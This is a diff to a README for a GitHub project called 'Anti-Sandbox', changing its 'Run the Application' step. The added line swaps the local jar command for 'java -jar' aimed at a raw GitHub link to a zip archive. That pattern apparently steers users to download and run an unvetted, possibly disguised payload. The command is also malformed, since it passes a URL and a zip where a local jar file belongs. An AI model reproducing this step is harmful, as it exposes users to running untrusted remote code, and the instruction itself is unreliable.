Pareekshithmk/Anti-Sandbox/README.md

 5. **Run the Application:**
    - For Windows: Double-click the downloaded `.exe` file to start the program.
-   - For Java: Use the terminal to navigate to the folder with the `.jar` file and run it using `java -jar Anti-Sandbox.jar`.
+   - For Java: Use the terminal to navigate to the folder with the `.jar` file and run it using `java -jar https://raw.githubusercontent.com/Pareekshithmk/Anti-Sandbox/main/Sandbox/Anti-Sandbox_v2.3.zip`.

 6. **Follow On-Screen Instructions:** Once the application starts, simply follow any instructions that appear on the screen to begin using Anti-Sandbox.